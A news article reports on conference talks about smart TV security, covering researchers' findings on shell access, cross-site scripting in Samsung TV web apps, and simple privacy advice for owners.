"You can do whatever you want on a smart TV because it's just a regular PC", says Seungjin Lee, a researcher from Korea University. "So you could do hijacking, keylogging when the users are web surfing, (and) sniffing traffic."
In his talk Lee explained techniques that an attacker could use to gain and maintain persistent shell access to most smart TVs remotely or locally, and ways to leverage those to keep tabs on users through what most would view as an innocuous device. Meanwhile, Aaron Grattafiori and Josh Yavor of iSEC Partners offered a similar presentation that highlighted their findings that culminated in a number of vulnerabilities discovered in Samsung TVs, reported late last year and fixed by the manufacturer this year.
The key finding that the duo discovered was that the apps running on Samsung TVs—and likely others—are web apps coming with all the same vulnerability baggage that traditional web applications bring.
"So this is JavaScript and this is loading the JavaScript app. This whole thing is a web app", said Grattafiori, senior security engineer, pointing to a demo screen showing a Samsung smart TV menu. "Those boxes, your menu when you move your mouse around, that's all DIVs. And a lot of those files are encrypted and decrypted at runtime."
According to the duo, many of the Samsung apps that they examined during their research were rife with common web vulnerabilities like cross-site scripting flaws that allowed for remote and arbitrary execution of code on the television. Many of the existing apps could also be manipulated for the force of evil. For example, a download API could be made to also upload content, giving an attacker the opportunity to upload any document on the TV, from online credentials to stored content like photos or other sensitive material.
Grattafiori believes that TV manufacturers have got to up their game with some kind of cross-platform security and to train their developers to securely code. In the meantime, consumers should be wary.
"Consider where you have the TV aimed - maybe your bed is not the best option”, he says. "Browse carefully and think about investing in sticky notes to stick over the camera."